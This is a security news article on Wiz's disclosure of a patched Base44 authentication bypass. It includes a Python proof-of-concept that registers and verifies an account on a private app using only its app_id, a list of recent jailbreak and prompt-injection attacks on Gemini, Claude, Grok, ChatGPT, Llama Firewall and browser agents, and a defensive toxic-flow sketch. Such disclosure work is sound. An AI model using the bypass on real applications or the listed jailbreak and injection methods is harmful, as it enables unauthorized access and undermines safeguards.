Wiz Uncovers Critical Access Bypass Flaw in AI-Powered Vibe Coding Platform Base44
Cybersecurity researchers have disclosed a now-patched critical security flaw in a popular vibe coding platform called Base44 that could allow unauthorized access to private applications built by its users.
“The vulnerability we discovered was remarkably simple to exploit — by providing only a non-secret app_id value to undocumented registration and email verification endpoints, an attacker could have created a verified account for private applications on their platform,” cloud security firm Wiz said in a report shared with The Hacker News.
The net result was a bypass of all authentication controls, including Single Sign-On (SSO) protections, granting full access to private applications and the data contained within them.
Following responsible disclosure on July 9, 2025, Wix, which owns Base44, rolled out an official fix within 24 hours. There is no evidence that the issue was ever maliciously exploited in the wild.
Vibe coding is an artificial intelligence (AI)-powered approach to generating application code from nothing more than a text prompt. The latest findings highlight an emerging attack surface, driven by the popularity of AI tools in enterprise environments, that may not be adequately addressed by traditional security paradigms.
The shortcoming unearthed by Wiz in Base44 concerns a misconfiguration that left two authentication-related endpoints exposed without any restrictions, thereby permitting anyone to register for private applications using only an “app_id” value as input –
- api/apps/{app_id}/auth/register, which is used to register a new user by providing an email address and password
- api/apps/{app_id}/auth/verify-otp, which is used to verify the user by providing a one-time password (OTP)
As it turns out, the “app_id” value is not a secret and is visible in the app’s URL and in its manifest.json file path. This meant an attacker could use a target application’s “app_id” not only to register a new account but also to verify the email address via OTP, thereby gaining access to an application they did not own in the first place.
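In practical terms, the reported flow amounts to two unauthenticated POST requests followed by a normal sign-in. The Python sketch below illustrates the idea; the host name, JSON field names, and OTP handling are assumptions made for illustration only and do not reflect Base44's documented API (the endpoints have since been secured).

```python
import requests

# Hypothetical proof-of-concept sketch of the reported flow. Endpoint paths
# follow the write-up; the base URL and request fields are assumptions.
BASE_URL = "https://app.base44.com"   # assumed host for illustration
APP_ID = "target-app-id"              # non-secret, visible in the app URL / manifest.json path
EMAIL = "attacker@example.com"
PASSWORD = "ChosenPassword123!"

# Step 1: register a new user against the private app using only its app_id.
register = requests.post(
    f"{BASE_URL}/api/apps/{APP_ID}/auth/register",
    json={"email": EMAIL, "password": PASSWORD},
    timeout=10,
)
print("register:", register.status_code)

# Step 2: verify the account with the OTP delivered to the attacker-controlled inbox.
otp = input("OTP received by email: ")
verify = requests.post(
    f"{BASE_URL}/api/apps/{APP_ID}/auth/verify-otp",
    json={"email": EMAIL, "otp": otp},
    timeout=10,
)
print("verify:", verify.status_code)

# With a verified account, the attacker could then sign in through the app's
# normal SSO/login page, bypassing the intended access controls.
```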

“After confirming our email address, we could just login via the SSO within the application page, and successfully bypass the authentication,” security researcher Gal Nagli said. “This vulnerability meant that private applications hosted on Base44 could be accessed without authorization.”
The development comes as security researchers have shown that state-of-the-art large language models (LLMs) and generative AI (GenAI) tools can be jailbroken or subjected to prompt injection attacks that cause them to behave in unintended ways, breaking free of their ethical or safety guardrails to produce malicious responses, synthetic content, or hallucinations, and, in some cases, even abandoning correct answers when presented with false counterarguments, posing risks to multi-turn AI systems.
Some of the attacks that have been documented in recent weeks include –
- A “toxic” combination of improper validation of context files, prompt injection, and misleading user experience (UX) in Gemini CLI that could lead to silent execution of malicious commands when inspecting untrusted code.
- Using a specially crafted email delivered via Gmail to trigger code execution through Claude Desktop by tricking Claude into rewriting the message so that it bypasses the restrictions imposed on it.
- Jailbreaking xAI’s Grok 4 model using Echo Chamber and Crescendo to circumvent the model’s safety systems and elicit harmful responses without providing any explicit malicious input. The LLM has also been found to leak restricted data and comply with hostile instructions in over 99% of prompt injection attempts in the absence of a hardened system prompt.
- Coercing OpenAI ChatGPT into disclosing valid Windows product keys via a guessing game.
- Exploiting Google Gemini for Workspace to generate an email summary that looks legitimate but includes malicious instructions or warnings that direct users to phishing sites by embedding a hidden directive in the message body using HTML and CSS trickery.
- Bypassing Meta’s Llama Firewall to defeat prompt injection safeguards using prompts written in languages other than English or employing simple obfuscation techniques like leetspeak and invisible Unicode characters.
- Deceiving browser agents into revealing sensitive information such as credentials via prompt injection attacks.
“The AI development landscape is evolving at unprecedented speed,” Nagli said. “Building security into the foundation of these platforms, not as an afterthought, is essential for realizing their transformative potential while protecting enterprise data.”

The disclosure comes as Invariant Labs, the research division of Snyk, detailed toxic flow analysis (TFA) as a way to harden agentic systems against Model Context Protocol (MCP) exploits like rug pulls and tool poisoning attacks.
“Instead of focusing on just prompt-level security, toxic flow analysis pre-emptively predicts the risk of attacks in an AI system by constructing potential attack scenarios leveraging deep understanding of an AI system’s capabilities and potential for misconfiguration,” the company said.
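To illustrate the concept, the toy Python sketch below models an agent's tools as untrusted sources and sensitive sinks and flags any plan that routes data from one to the other. It is a simplified illustration of the idea behind toxic flow analysis, not Invariant Labs' implementation; the tool names and classifications are assumptions.

```python
from dataclasses import dataclass

@dataclass
class Tool:
    name: str
    untrusted_source: bool = False   # output may carry attacker-controlled content
    sensitive_sink: bool = False     # can exfiltrate data or perform privileged actions

# Hypothetical tool inventory for an example agent.
TOOLS = {
    "fetch_web_page": Tool("fetch_web_page", untrusted_source=True),
    "read_private_repo": Tool("read_private_repo"),
    "send_email": Tool("send_email", sensitive_sink=True),
}

def toxic_flows(plan: list[str]) -> list[tuple[str, str]]:
    """Return (source, sink) pairs where untrusted data could reach a sensitive sink."""
    flows = []
    for i, step in enumerate(plan):
        if TOOLS[step].untrusted_source:
            for later in plan[i + 1:]:
                if TOOLS[later].sensitive_sink:
                    flows.append((step, later))
    return flows

# A plan that fetches attacker-controllable web content and later sends email
# gets flagged before it ever runs.
print(toxic_flows(["fetch_web_page", "read_private_repo", "send_email"]))
# -> [('fetch_web_page', 'send_email')]
```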
Furthermore, the MCP ecosystem has introduced traditional security risks, with as many as 1,862 MCP servers exposed to the internet without any authentication or access controls, putting them at risk of data theft, command execution, and abuse of the victim's resources that can rack up cloud bills.
“Attackers may find and extract OAuth tokens, API keys, and database credentials stored on the server, granting them access to all the other services the AI is connected to,” Knostic said.